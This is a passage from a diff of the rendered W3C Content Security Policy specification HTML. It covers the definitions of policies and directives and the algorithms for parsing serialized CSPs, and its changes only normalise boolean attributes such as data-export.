     <h3 class="heading settled" data-level="2.2" id="framework-policy"><span class="secno">2.2. </span><span class="content">Policies</span><a class="self-link" href="#framework-policy"></a></h3>
-    <p>A <dfn class="dfn-paneled" data-dfn-type="dfn" data-export data-local-lt="policy" data-lt="content security policy object" id="content-security-policy-object">policy</dfn> defines allowed
+    <p>A <dfn class="dfn-paneled" data-dfn-type="dfn" data-export="" data-local-lt="policy" data-lt="content security policy object" id="content-security-policy-object">policy</dfn> defines allowed
   and restricted behaviors, and may be applied to a <code class="idl"><a data-link-type="idl" href="https://dom.spec.whatwg.org/#document" id="ref-for-document①">Document</a></code>, <code class="idl"><a data-link-type="idl" href="https://html.spec.whatwg.org/multipage/workers.html#workerglobalscope" id="ref-for-workerglobalscope">WorkerGlobalScope</a></code>, or <code class="idl"><a data-link-type="idl" href="https://drafts.css-houdini.org/worklets/#workletglobalscope" id="ref-for-workletglobalscope">WorkletGlobalScope</a></code> as described in <a href="#initialize-global-object-csp">§4.2.2 Initialize a global object’s CSP list</a> and in <a href="#initialize-document-csp">§4.2.1 Initialize a Document's CSP list</a>.</p>
-    <p>Each policy has an associated <dfn class="dfn-paneled" data-dfn-for="policy" data-dfn-type="dfn" data-export id="policy-directive-set">directive set</dfn>, which is an <a data-link-type="dfn" href="https://infra.spec.whatwg.org/#ordered-set" id="ref-for-ordered-set">ordered
+    <p>Each policy has an associated <dfn class="dfn-paneled" data-dfn-for="policy" data-dfn-type="dfn" data-export="" id="policy-directive-set">directive set</dfn>, which is an <a data-link-type="dfn" href="https://infra.spec.whatwg.org/#ordered-set" id="ref-for-ordered-set">ordered
   set</a> of <a data-link-type="dfn" href="#directives" id="ref-for-directives">directives</a> that define the policy’s implications when applied.</p>
-    <p>Each policy has an associated <dfn class="dfn-paneled" data-dfn-for="policy" data-dfn-type="dfn" data-export id="policy-disposition">disposition</dfn>, which is either
+    <p>Each policy has an associated <dfn class="dfn-paneled" data-dfn-for="policy" data-dfn-type="dfn" data-export="" id="policy-disposition">disposition</dfn>, which is either
   "<code>enforce</code>" or "<code>report</code>".</p>
-    <p>Each policy has an associated <dfn class="dfn-paneled" data-dfn-for="policy" data-dfn-type="dfn" data-export id="policy-source">source</dfn>, which is either "<code>header</code>"
+    <p>Each policy has an associated <dfn class="dfn-paneled" data-dfn-for="policy" data-dfn-type="dfn" data-export="" id="policy-source">source</dfn>, which is either "<code>header</code>"
   or "<code>meta</code>".</p>
-    <p>Each policy has an associated <dfn class="dfn-paneled" data-dfn-for="policy" data-dfn-type="dfn" data-export id="policy-self-origin">self-origin</dfn>, which
+    <p>Each policy has an associated <dfn class="dfn-paneled" data-dfn-for="policy" data-dfn-type="dfn" data-export="" id="policy-self-origin">self-origin</dfn>, which
   is an <a data-link-type="dfn" href="https://html.spec.whatwg.org/multipage/origin.html#concept-origin" id="ref-for-concept-origin">origin</a> that is used when matching the <a data-link-type="grammar" href="#grammardef-self" id="ref-for-grammardef-self"><code>'self'</code></a> keyword.</p>
     <p class="note" role="note"><span>Note:</span> This is needed to facilitate the <a data-link-type="grammar" href="#grammardef-self" id="ref-for-grammardef-self①"><code>'self'</code></a> checks of <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#local-scheme" id="ref-for-local-scheme①">local scheme</a> documents/workers that have inherited their policy but
   have an <a data-link-type="dfn" href="https://html.spec.whatwg.org/multipage/origin.html#concept-origin-opaque" id="ref-for-concept-origin-opaque">opaque origin</a>. Most of the time this will simply be the <a data-link-type="dfn" href="https://html.spec.whatwg.org/multipage/webappapis.html#environment-settings-object" id="ref-for-environment-settings-object">environment settings object</a>’s <a data-link-type="dfn" href="https://html.spec.whatwg.org/multipage/webappapis.html#concept-settings-object-origin" id="ref-for-concept-settings-object-origin">origin</a>.
   The <a href="#initialize-document-csp">§4.2.1 Initialize a Document's CSP list</a> algorithm describes situations in which
   a policy is inherited.</p>
-    <p>Multiple <a data-link-type="dfn" href="#content-security-policy-object" id="ref-for-content-security-policy-object">policies</a> can be applied to a single resource, and are collected into a <a data-link-type="dfn" href="https://infra.spec.whatwg.org/#list" id="ref-for-list">list</a> of <a data-link-type="dfn" href="#content-security-policy-object" id="ref-for-content-security-policy-object①">policies</a> known as a <dfn class="dfn-paneled" data-dfn-type="dfn" data-export id="csp-list">CSP list</dfn>.</p>
-    <p>A <a data-link-type="dfn" href="#csp-list" id="ref-for-csp-list">CSP list</a> <dfn data-dfn-type="dfn" data-export id="contains-a-header-delivered-content-security-policy">contains a header-delivered Content Security Policy<a class="self-link" href="#contains-a-header-delivered-content-security-policy"></a></dfn> if it <a data-link-type="dfn" href="https://infra.spec.whatwg.org/#list-contain" id="ref-for-list-contain">contains</a> a <a data-link-type="dfn" href="#content-security-policy-object" id="ref-for-content-security-policy-object②">policy</a> whose <a data-link-type="dfn" href="#policy-source" id="ref-for-policy-source">source</a> is "<code>header</code>".</p>
-    <p>A <dfn class="dfn-paneled" data-dfn-type="dfn" data-export id="serialized-csp">serialized CSP</dfn> is an <a data-link-type="dfn" href="https://infra.spec.whatwg.org/#ascii-string" id="ref-for-ascii-string">ASCII string</a> consisting of a semicolon-delimited
+    <p>Multiple <a data-link-type="dfn" href="#content-security-policy-object" id="ref-for-content-security-policy-object">policies</a> can be applied to a single resource, and are collected into a <a data-link-type="dfn" href="https://infra.spec.whatwg.org/#list" id="ref-for-list">list</a> of <a data-link-type="dfn" href="#content-security-policy-object" id="ref-for-content-security-policy-object①">policies</a> known as a <dfn class="dfn-paneled" data-dfn-type="dfn" data-export="" id="csp-list">CSP list</dfn>.</p>
+    <p>A <a data-link-type="dfn" href="#csp-list" id="ref-for-csp-list">CSP list</a> <dfn data-dfn-type="dfn" data-export="" id="contains-a-header-delivered-content-security-policy">contains a header-delivered Content Security Policy<a class="self-link" href="#contains-a-header-delivered-content-security-policy"></a></dfn> if it <a data-link-type="dfn" href="https://infra.spec.whatwg.org/#list-contain" id="ref-for-list-contain">contains</a> a <a data-link-type="dfn" href="#content-security-policy-object" id="ref-for-content-security-policy-object②">policy</a> whose <a data-link-type="dfn" href="#policy-source" id="ref-for-policy-source">source</a> is "<code>header</code>".</p>
+    <p>A <dfn class="dfn-paneled" data-dfn-type="dfn" data-export="" id="serialized-csp">serialized CSP</dfn> is an <a data-link-type="dfn" href="https://infra.spec.whatwg.org/#ascii-string" id="ref-for-ascii-string">ASCII string</a> consisting of a semicolon-delimited
   series of <a data-link-type="dfn" href="#serialized-directive" id="ref-for-serialized-directive">serialized directives</a>, adhering to the following ABNF grammar <a data-link-type="biblio" href="#biblio-rfc5234">[RFC5234]</a>:</p>
-<pre><dfn class="dfn-paneled" data-dfn-type="grammar" data-export id="grammardef-serialized-policy">serialized-policy</dfn> =
+<pre><dfn class="dfn-paneled" data-dfn-type="grammar" data-export="" id="grammardef-serialized-policy">serialized-policy</dfn> =
     <a data-link-type="grammar" href="#grammardef-serialized-directive" id="ref-for-grammardef-serialized-directive">serialized-directive</a> *( <a data-link-type="grammar" href="#grammardef-optional-ascii-whitespace" id="ref-for-grammardef-optional-ascii-whitespace⑤">optional-ascii-whitespace</a> ";" [ <a data-link-type="grammar" href="#grammardef-optional-ascii-whitespace" id="ref-for-grammardef-optional-ascii-whitespace⑥">optional-ascii-whitespace</a> <a data-link-type="grammar" href="#grammardef-serialized-directive" id="ref-for-grammardef-serialized-directive①">serialized-directive</a> ] )
 </pre>
-    <p>A <dfn class="dfn-paneled" data-dfn-type="dfn" data-export id="serialized-csp-list">serialized CSP list</dfn> is an <a data-link-type="dfn" href="https://infra.spec.whatwg.org/#ascii-string" id="ref-for-ascii-string①">ASCII string</a> consisting of a comma-delimited
+    <p>A <dfn class="dfn-paneled" data-dfn-type="dfn" data-export="" id="serialized-csp-list">serialized CSP list</dfn> is an <a data-link-type="dfn" href="https://infra.spec.whatwg.org/#ascii-string" id="ref-for-ascii-string①">ASCII string</a> consisting of a comma-delimited
   series of <a data-link-type="dfn" href="#serialized-csp" id="ref-for-serialized-csp">serialized CSPs</a>, adhering to the following ABNF grammar <a data-link-type="biblio" href="#biblio-rfc5234">[RFC5234]</a>:</p>
-<pre><dfn data-dfn-type="grammar" data-export id="grammardef-serialized-policy-list">serialized-policy-list<a class="self-link" href="#grammardef-serialized-policy-list"></a></dfn> = 1#<a data-link-type="grammar" href="#grammardef-serialized-policy" id="ref-for-grammardef-serialized-policy">serialized-policy</a>
+<pre><dfn data-dfn-type="grammar" data-export="" id="grammardef-serialized-policy-list">serialized-policy-list<a class="self-link" href="#grammardef-serialized-policy-list"></a></dfn> = 1#<a data-link-type="grammar" href="#grammardef-serialized-policy" id="ref-for-grammardef-serialized-policy">serialized-policy</a>
                     ; The '#' rule is the one defined in section 7 of RFC 7230
                     ; but it incorporates the modifications specified
                     ; in section 2.1 of this document.
 </pre>
     <h4 class="heading settled algorithm" data-algorithm="Parse a serialized CSP" data-level="2.2.1" id="parse-serialized-policy"><span class="secno">2.2.1. </span><span class="content"> Parse a serialized CSP </span><a class="self-link" href="#parse-serialized-policy"></a></h4>
-    <p>To <dfn class="dfn-paneled" data-dfn-type="abstract-op" data-export id="abstract-opdef-parse-a-serialized-csp">parse a serialized CSP</dfn>, given a <a data-link-type="dfn" href="#serialized-csp" id="ref-for-serialized-csp①">serialized CSP</a> (<var>serialized</var>), a <a data-link-type="dfn" href="#policy-source" id="ref-for-policy-source①">source</a> (<var>source</var>), and a <a data-link-type="dfn" href="#policy-disposition" id="ref-for-policy-disposition">disposition</a> (<var>disposition</var>), execute the
+    <p>To <dfn class="dfn-paneled" data-dfn-type="abstract-op" data-export="" id="abstract-opdef-parse-a-serialized-csp">parse a serialized CSP</dfn>, given a <a data-link-type="dfn" href="#serialized-csp" id="ref-for-serialized-csp①">serialized CSP</a> (<var>serialized</var>), a <a data-link-type="dfn" href="#policy-source" id="ref-for-policy-source①">source</a> (<var>source</var>), and a <a data-link-type="dfn" href="#policy-disposition" id="ref-for-policy-disposition">disposition</a> (<var>disposition</var>), execute the
   following steps.</p>
     <p>This algorithm returns a <a data-link-type="dfn" href="#content-security-policy-object" id="ref-for-content-security-policy-object③">Content Security Policy object</a>. If <var>serialized</var> could not be
   parsed, the object’s <a data-link-type="dfn" href="#policy-directive-set" id="ref-for-policy-directive-set">directive set</a> will be empty.</p>
     <ol class="algorithm">
-     <li data-md>
+     <li data-md="">
       <p>Let <var>policy</var> be a new <a data-link-type="dfn" href="#content-security-policy-object" id="ref-for-content-security-policy-object④">policy</a> with an empty <a data-link-type="dfn" href="#policy-directive-set" id="ref-for-policy-directive-set①">directive set</a>, a <a data-link-type="dfn" href="#policy-source" id="ref-for-policy-source②">source</a> of <var>source</var>, and a <a data-link-type="dfn" href="#policy-disposition" id="ref-for-policy-disposition①">disposition</a> of <var>disposition</var>.</p>
-     <li data-md>
+     <li data-md="">
       <p>For each <var>token</var> returned by <a data-link-type="dfn" href="https://infra.spec.whatwg.org/#strictly-split" id="ref-for-strictly-split">strictly splitting</a> <var>serialized</var> on
   the U+003B SEMICOLON character (<code>;</code>):</p>
       <ol>
-       <li data-md>
+       <li data-md="">
         <p><a data-link-type="dfn" href="https://infra.spec.whatwg.org/#strip-leading-and-trailing-ascii-whitespace" id="ref-for-strip-leading-and-trailing-ascii-whitespace">Strip leading and trailing ASCII whitespace</a> from <var>token</var>.</p>
-       <li data-md>
+       <li data-md="">
         <p>If <var>token</var> is an empty string, <a data-link-type="dfn" href="https://infra.spec.whatwg.org/#iteration-continue" id="ref-for-iteration-continue">continue</a>.</p>
-       <li data-md>
+       <li data-md="">
         <p>Let <var>directive name</var> be the result of <a data-link-type="dfn" href="https://infra.spec.whatwg.org/#collect-a-sequence-of-code-points" id="ref-for-collect-a-sequence-of-code-points">collecting a sequence of code points</a> from <var>token</var> which are not <a data-link-type="dfn" href="https://infra.spec.whatwg.org/#ascii-whitespace" id="ref-for-ascii-whitespace①">ASCII whitespace</a>.</p>
-       <li data-md>
+       <li data-md="">
         <p>Set <var>directive name</var> to be the result of running <a data-link-type="dfn" href="https://infra.spec.whatwg.org/#ascii-lowercase" id="ref-for-ascii-lowercase">ASCII lowercase</a> on <var>directive name</var>.</p>
         <p class="note" role="note"><span>Note:</span> Directive names are case-insensitive, that is: <code>script-SRC 'none'</code> and <code>ScRiPt-sRc 'none'</code> are equivalent.</p>
-       <li data-md>
+       <li data-md="">
         <p>If <var>policy</var>’s <a data-link-type="dfn" href="#policy-directive-set" id="ref-for-policy-directive-set②">directive set</a> contains a <a data-link-type="dfn" href="#directives" id="ref-for-directives①">directive</a> whose <a data-link-type="dfn" href="#directive-name" id="ref-for-directive-name">name</a> is <var>directive name</var>, <a data-link-type="dfn" href="https://infra.spec.whatwg.org/#iteration-continue" id="ref-for-iteration-continue①">continue</a>.</p>
         <p class="note" role="note"><span>Note:</span> In this case, the user agent SHOULD notify developers that a duplicate
   directive was ignored. A console warning might be appropriate, for example.</p>
-       <li data-md>
+       <li data-md="">
         <p>Let <var>directive value</var> be the result of <a data-link-type="dfn" href="https://infra.spec.whatwg.org/#split-on-ascii-whitespace" id="ref-for-split-on-ascii-whitespace">splitting <var>token</var> on
   ASCII whitespace</a>.</p>
-       <li data-md>
+       <li data-md="">
         <p>Let <var>directive</var> be a new <a data-link-type="dfn" href="#directives" id="ref-for-directives②">directive</a> whose <a data-link-type="dfn" href="#directive-name" id="ref-for-directive-name①">name</a> is <var>directive name</var>, and <a data-link-type="dfn" href="#directive-value" id="ref-for-directive-value">value</a> is <var>directive value</var>.</p>
-       <li data-md>
+       <li data-md="">
         <p><a data-link-type="dfn" href="https://infra.spec.whatwg.org/#set-append" id="ref-for-set-append">Append</a> <var>directive</var> to <var>policy</var>’s <a data-link-type="dfn" href="#policy-directive-set" id="ref-for-policy-directive-set③">directive set</a>.</p>
       </ol>
-     <li data-md>
+     <li data-md="">
       <p>Return <var>policy</var>.</p>
     </ol>
     <h4 class="heading settled algorithm" data-algorithm="Parse a serialized CSP list" data-level="2.2.2" id="parse-serialized-policy-list"><span class="secno">2.2.2. </span><span class="content"> Parse a serialized CSP list </span><a class="self-link" href="#parse-serialized-policy-list"></a></h4>
-    <p>To <dfn class="dfn-paneled" data-dfn-type="abstract-op" data-export id="abstract-opdef-parse-a-serialized-csp-list">parse a serialized CSP list</dfn>, given a <a data-link-type="dfn" href="#serialized-csp-list" id="ref-for-serialized-csp-list">serialized CSP list</a> (<var>list</var>), a <a data-link-type="dfn" href="#policy-source" id="ref-for-policy-source③">source</a> (<var>source</var>), and a <a data-link-type="dfn" href="#policy-disposition" id="ref-for-policy-disposition②">disposition</a> (<var>disposition</var>), execute the following
+    <p>To <dfn class="dfn-paneled" data-dfn-type="abstract-op" data-export="" id="abstract-opdef-parse-a-serialized-csp-list">parse a serialized CSP list</dfn>, given a <a data-link-type="dfn" href="#serialized-csp-list" id="ref-for-serialized-csp-list">serialized CSP list</a> (<var>list</var>), a <a data-link-type="dfn" href="#policy-source" id="ref-for-policy-source③">source</a> (<var>source</var>), and a <a data-link-type="dfn" href="#policy-disposition" id="ref-for-policy-disposition②">disposition</a> (<var>disposition</var>), execute the following
   steps.</p>
     <p>This algorithm returns a <a data-link-type="dfn" href="https://infra.spec.whatwg.org/#list" id="ref-for-list①">list</a> of <a data-link-type="dfn" href="#content-security-policy-object" id="ref-for-content-security-policy-object⑤">Content Security Policy objects</a>. If <var>list</var> cannot be
   parsed, the returned list will be empty.</p>
     <ol class="algorithm">
-     <li data-md>
+     <li data-md="">
       <p>Let <var>policies</var> be an empty <a data-link-type="dfn" href="https://infra.spec.whatwg.org/#list" id="ref-for-list②">list</a>.</p>
-     <li data-md>
+     <li data-md="">
       <p>For each <var>token</var> returned by <a data-link-type="dfn" href="https://infra.spec.whatwg.org/#split-on-commas" id="ref-for-split-on-commas">splitting <var>list</var> on commas</a>:</p>
       <ol>
-       <li data-md>
+       <li data-md="">
         <p>Let <var>policy</var> be the result of <a data-link-type="abstract-op" href="#abstract-opdef-parse-a-serialized-csp" id="ref-for-abstract-opdef-parse-a-serialized-csp">parsing</a> <var>token</var>, with a <a data-link-type="dfn" href="#policy-source" id="ref-for-policy-source④">source</a> of <var>source</var>, and <a data-link-type="dfn" href="#policy-disposition" id="ref-for-policy-disposition③">disposition</a> of <var>disposition</var>.</p>
-       <li data-md>
+       <li data-md="">
         <p>If <var>policy</var>’s <a data-link-type="dfn" href="#policy-directive-set" id="ref-for-policy-directive-set④">directive set</a> is empty, <a data-link-type="dfn" href="https://infra.spec.whatwg.org/#iteration-continue" id="ref-for-iteration-continue②">continue</a>.</p>
-       <li data-md>
+       <li data-md="">
         <p><a data-link-type="dfn" href="https://infra.spec.whatwg.org/#list-append" id="ref-for-list-append">Append</a> <var>policy</var> to <var>policies</var>.</p>
       </ol>
-     <li data-md>
+     <li data-md="">
       <p>Return <var>policies</var>.</p>
     </ol>
     <h3 class="heading settled" data-level="2.3" id="framework-directives"><span class="secno">2.3. </span><span class="content">Directives</span><a class="self-link" href="#framework-directives"></a></h3>
-    <p>Each <a data-link-type="dfn" href="#content-security-policy-object" id="ref-for-content-security-policy-object⑥">policy</a> contains an <a data-link-type="dfn" href="https://infra.spec.whatwg.org/#ordered-set" id="ref-for-ordered-set①">ordered set</a> of <dfn class="dfn-paneled" data-dfn-type="dfn" data-export id="directives">directives</dfn> (its <a data-link-type="dfn" href="#policy-directive-set" id="ref-for-policy-directive-set⑤">directive set</a>), each of which controls a specific behavior. The directives
+    <p>Each <a data-link-type="dfn" href="#content-security-policy-object" id="ref-for-content-security-policy-object⑥">policy</a> contains an <a data-link-type="dfn" href="https://infra.spec.whatwg.org/#ordered-set" id="ref-for-ordered-set①">ordered set</a> of <dfn class="dfn-paneled" data-dfn-type="dfn" data-export="" id="directives">directives</dfn> (its <a data-link-type="dfn" href="#policy-directive-set" id="ref-for-policy-directive-set⑤">directive set</a>), each of which controls a specific behavior. The directives
   defined in this document are described in detail in <a href="#csp-directives">§6 Content Security Policy Directives</a>.</p>
-    <p>Each <a data-link-type="dfn" href="#directives" id="ref-for-directives③">directive</a> is a <dfn class="dfn-paneled" data-dfn-for="directive" data-dfn-type="dfn" data-export id="directive-name">name</dfn> / <dfn class="dfn-paneled" data-dfn-for="directive" data-dfn-type="dfn" data-export id="directive-value">value</dfn> pair. The <a data-link-type="dfn" href="#directive-name" id="ref-for-directive-name②">name</a> is a
+    <p>Each <a data-link-type="dfn" href="#directives" id="ref-for-directives③">directive</a> is a <dfn class="dfn-paneled" data-dfn-for="directive" data-dfn-type="dfn" data-export="" id="directive-name">name</dfn> / <dfn class="dfn-paneled" data-dfn-for="directive" data-dfn-type="dfn" data-export="" id="directive-value">value</dfn> pair. The <a data-link-type="dfn" href="#directive-name" id="ref-for-directive-name②">name</a> is a
   non-empty <a data-link-type="dfn" href="https://infra.spec.whatwg.org/#string" id="ref-for-string">string</a>, and the <a data-link-type="dfn" href="#directive-value" id="ref-for-directive-value①">value</a> is a <a data-link-type="dfn" href="https://infra.spec.whatwg.org/#ordered-set" id="ref-for-ordered-set②">set</a> of non-empty <a data-link-type="dfn" href="https://infra.spec.whatwg.org/#string" id="ref-for-string①">strings</a>. The <a data-link-type="dfn" href="#directive-value" id="ref-for-directive-value②">value</a> MAY be <a data-link-type="dfn" href="https://infra.spec.whatwg.org/#list-is-empty" id="ref-for-list-is-empty">empty</a>.</p>
-    <p>A <dfn class="dfn-paneled" data-dfn-type="dfn" data-export id="serialized-directive">serialized directive</dfn> is an <a data-link-type="dfn" href="https://infra.spec.whatwg.org/#ascii-string" id="ref-for-ascii-string②">ASCII string</a>, consisting of one or more
+    <p>A <dfn class="dfn-paneled" data-dfn-type="dfn" data-export="" id="serialized-directive">serialized directive</dfn> is an <a data-link-type="dfn" href="https://infra.spec.whatwg.org/#ascii-string" id="ref-for-ascii-string②">ASCII string</a>, consisting of one or more
   whitespace-delimited tokens, and adhering to the following ABNF <a data-link-type="biblio" href="#biblio-rfc5234">[RFC5234]</a>:</p>
-<pre><dfn class="dfn-paneled" data-dfn-type="grammar" data-export id="grammardef-serialized-directive">serialized-directive</dfn> = <a data-link-type="grammar" href="#grammardef-directive-name" id="ref-for-grammardef-directive-name">directive-name</a> [ <a data-link-type="grammar" href="#grammardef-required-ascii-whitespace" id="ref-for-grammardef-required-ascii-whitespace">required-ascii-whitespace</a> <a data-link-type="grammar" href="#grammardef-directive-value" id="ref-for-grammardef-directive-value">directive-value</a> ]
-<dfn class="dfn-paneled" data-dfn-type="grammar" data-export id="grammardef-directive-name">directive-name</dfn>       = 1*( <a data-link-type="grammar" href="https://tools.ietf.org/html/rfc5234#appendix-B.1" id="ref-for-appendix-B.1">ALPHA</a> / <a data-link-type="grammar" href="https://tools.ietf.org/html/rfc5234#appendix-B.1" id="ref-for-appendix-B.1①">DIGIT</a> / "-" )
-<dfn class="dfn-paneled" data-dfn-type="grammar" data-export id="grammardef-directive-value">directive-value</dfn>      = *( <a data-link-type="grammar" href="#grammardef-required-ascii-whitespace" id="ref-for-grammardef-required-ascii-whitespace①">required-ascii-whitespace</a> / ( %x21-%x2B / %x2D-%x3A / %x3C-%x7E ) )
+<pre><dfn class="dfn-paneled" data-dfn-type="grammar" data-export="" id="grammardef-serialized-directive">serialized-directive</dfn> = <a data-link-type="grammar" href="#grammardef-directive-name" id="ref-for-grammardef-directive-name">directive-name</a> [ <a data-link-type="grammar" href="#grammardef-required-ascii-whitespace" id="ref-for-grammardef-required-ascii-whitespace">required-ascii-whitespace</a> <a data-link-type="grammar" href="#grammardef-directive-value" id="ref-for-grammardef-directive-value">directive-value</a> ]
+<dfn class="dfn-paneled" data-dfn-type="grammar" data-export="" id="grammardef-directive-name">directive-name</dfn>       = 1*( <a data-link-type="grammar" href="https://tools.ietf.org/html/rfc5234#appendix-B.1" id="ref-for-appendix-B.1">ALPHA</a> / <a data-link-type="grammar" href="https://tools.ietf.org/html/rfc5234#appendix-B.1" id="ref-for-appendix-B.1①">DIGIT</a> / "-" )
+<dfn class="dfn-paneled" data-dfn-type="grammar" data-export="" id="grammardef-directive-value">directive-value</dfn>      = *( <a data-link-type="grammar" href="#grammardef-required-ascii-whitespace" id="ref-for-grammardef-required-ascii-whitespace①">required-ascii-whitespace</a> / ( %x21-%x2B / %x2D-%x3A / %x3C-%x7E ) )
                        ; Directive values may contain whitespace and <a data-link-type="grammar" href="https://tools.ietf.org/html/rfc5234#appendix-B.1" id="ref-for-appendix-B.1②">VCHAR</a> characters,
                        ; excluding ";" and ",". The second half of the definition
                        ; above represents all <a data-link-type="grammar" href="https://tools.ietf.org/html/rfc5234#appendix-B.1" id="ref-for-appendix-B.1③">VCHAR</a> characters (%x21-%x7E)
@@ -2146,97 +2099,97 @@ c-[il] { color: #000000 } /* Literal.Number.Integer.Long */
 </pre>
     <p><a data-link-type="dfn" href="#directives" id="ref-for-directives④">Directives</a> have a number of associated algorithms:</p>
     <ol>
-     <li data-md>
-      <p>A <dfn class="dfn-paneled" data-dfn-for="directive" data-dfn-type="dfn" data-export id="directive-pre-request-check">pre-request check</dfn>, which takes a <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-request" id="ref-for-concept-request">request</a> and a <a data-link-type="dfn" href="#content-security-policy-object" id="ref-for-content-security-policy-object⑦">policy</a> as an argument, and is executed
+     <li data-md="">
+      <p>A <dfn class="dfn-paneled" data-dfn-for="directive" data-dfn-type="dfn" data-export="" id="directive-pre-request-check">pre-request check</dfn>, which takes a <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-request" id="ref-for-concept-request">request</a> and a <a data-link-type="dfn" href="#content-security-policy-object" id="ref-for-content-security-policy-object⑦">policy</a> as an argument, and is executed
   during <a href="#should-block-request">§4.1.3 Should request be blocked by Content Security Policy?</a>. This algorithm returns "<code>Allowed</code>" unless
   otherwise specified.</p>
-     <li data-md>
-      <p>A <dfn class="dfn-paneled" data-dfn-for="directive" data-dfn-type="dfn" data-export id="directive-post-request-check">post-request check</dfn>, which takes a <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-request" id="ref-for-concept-request①">request</a>, a <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-response" id="ref-for-concept-response">response</a>, and a <a data-link-type="dfn" href="#content-security-policy-object" id="ref-for-content-security-policy-object⑧">policy</a> as arguments,
+     <li data-md="">
+      <p>A <dfn class="dfn-paneled" data-dfn-for="directive" data-dfn-type="dfn" data-export="" id="directive-post-request-check">post-request check</dfn>, which takes a <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-request" id="ref-for-concept-request①">request</a>, a <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-response" id="ref-for-concept-response">response</a>, and a <a data-link-type="dfn" href="#content-security-policy-object" id="ref-for-content-security-policy-object⑧">policy</a> as arguments,
   and is executed during <a href="#should-block-response">§4.1.4 Should response to request be blocked by Content Security Policy?</a>. This algorithm returns
   "<code>Allowed</code>" unless otherwise specified.</p>
-     <li data-md>
-      <p>A <dfn class="dfn-paneled" data-dfn-for="directive" data-dfn-type="dfn" data-export id="directive-response-check">response check</dfn>, which takes a <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-request" id="ref-for-concept-request②">request</a>, a <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-response" id="ref-for-concept-response①">response</a>, and a <a data-link-type="dfn" href="#content-security-policy-object" id="ref-for-content-security-policy-object⑨">policy</a> as arguments,
+     <li data-md="">
+      <p>A <dfn class="dfn-paneled" data-dfn-for="directive" data-dfn-type="dfn" data-export="" id="directive-response-check">response check</dfn>, which takes a <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-request" id="ref-for-concept-request②">request</a>, a <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-response" id="ref-for-concept-response①">response</a>, and a <a data-link-type="dfn" href="#content-security-policy-object" id="ref-for-content-security-policy-object⑨">policy</a> as arguments,
   and is executed during <a href="#should-block-response">§4.1.4 Should response to request be blocked by Content Security Policy?</a>. This algorithm returns
   "<code>Allowed</code>" unless otherwise specified.</p>
-     <li data-md>
-      <p>An <dfn class="dfn-paneled" data-dfn-for="directive" data-dfn-type="dfn" data-export id="directive-inline-check">inline check</dfn>, which takes an <code class="idl"><a data-link-type="idl" href="https://dom.spec.whatwg.org/#element" id="ref-for-element">Element</a></code> a
+     <li data-md="">
+      <p>An <dfn class="dfn-paneled" data-dfn-for="directive" data-dfn-type="dfn" data-export="" id="directive-inline-check">inline check</dfn>, which takes an <code class="idl"><a data-link-type="idl" href="https://dom.spec.whatwg.org/#element" id="ref-for-element">Element</a></code> a
   type string, a <a data-link-type="dfn" href="#content-security-policy-object" id="ref-for-content-security-policy-object①⓪">policy</a>, and a source string as arguments,
   and is executed during <a href="#should-block-inline">§4.2.4 Should element’s inline type behavior be blocked by Content Security Policy?</a> and during <a href="#should-block-navigation-request">§4.2.5 Should navigation request of type from source in target be blocked
     by Content Security Policy?</a> for <code>javascript:</code> requests. This
   algorithm returns "<code>Allowed</code>" unless otherwise specified.</p>
-     <li data-md>
-      <p>An <dfn class="dfn-paneled" data-dfn-for="directive" data-dfn-type="dfn" data-export id="directive-initialization">initialization</dfn>, which takes a <code class="idl"><a data-link-type="idl" href="https://dom.spec.whatwg.org/#document" id="ref-for-document②">Document</a></code> or <a data-link-type="dfn" href="https://html.spec.whatwg.org/multipage/webappapis.html#global-object" id="ref-for-global-object">global object</a>, a <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-response" id="ref-for-concept-response②">response</a>, and a <a data-link-type="dfn" href="#content-security-policy-object" id="ref-for-content-security-policy-object①①">policy</a> as arguments. This algorithm is executed during <a href="#initialize-document-csp">§4.2.1 Initialize a Document's CSP list</a>,
+     <li data-md="">
+      <p>An <dfn class="dfn-paneled" data-dfn-for="directive" data-dfn-type="dfn" data-export="" id="directive-initialization">initialization</dfn>, which takes a <code class="idl"><a data-link-type="idl" href="https://dom.spec.whatwg.org/#document" id="ref-for-document②">Document</a></code> or <a data-link-type="dfn" href="https://html.spec.whatwg.org/multipage/webappapis.html#global-object" id="ref-for-global-object">global object</a>, a <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-response" id="ref-for-concept-response②">response</a>, and a <a data-link-type="dfn" href="#content-security-policy-object" id="ref-for-content-security-policy-object①①">policy</a> as arguments. This algorithm is executed during <a href="#initialize-document-csp">§4.2.1 Initialize a Document's CSP list</a>,
   and has no effect unless otherwise specified.</p>
-     <li data-md>
-      <p>A <dfn class="dfn-paneled" data-dfn-for="directive" data-dfn-type="dfn" data-export id="directive-pre-navigation-check">pre-navigation check</dfn>, which takes a <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-request" id="ref-for-concept-request③">request</a>, a navigation type string ("<code>form-submission</code>"
+     <li data-md="">
+      <p>A <dfn class="dfn-paneled" data-dfn-for="directive" data-dfn-type="dfn" data-export="" id="directive-pre-navigation-check">pre-navigation check</dfn>, which takes a <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-request" id="ref-for-concept-request③">request</a>, a navigation type string ("<code>form-submission</code>"
   or "<code>other</code>"), and a <a data-link-type="dfn" href="#content-security-policy-object" id="ref-for-content-security-policy-object①②">policy</a> as arguments, and
   is executed during <a href="#should-block-navigation-request">§4.2.5 Should navigation request of type from source in target be blocked
     by Content Security Policy?</a>. It returns
   "<code>Allowed</code>" unless otherwise specified.</p>
-     <li data-md>
-      <p>A <dfn class="dfn-paneled" data-dfn-for="directive" data-dfn-type="dfn" data-export id="directive-navigation-response-check">navigation response check</dfn>, which takes a <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-request" id="ref-for-concept-request④">request</a>, a navigation type string ("<code>form-submission</code>" or "<code>other</code>"),
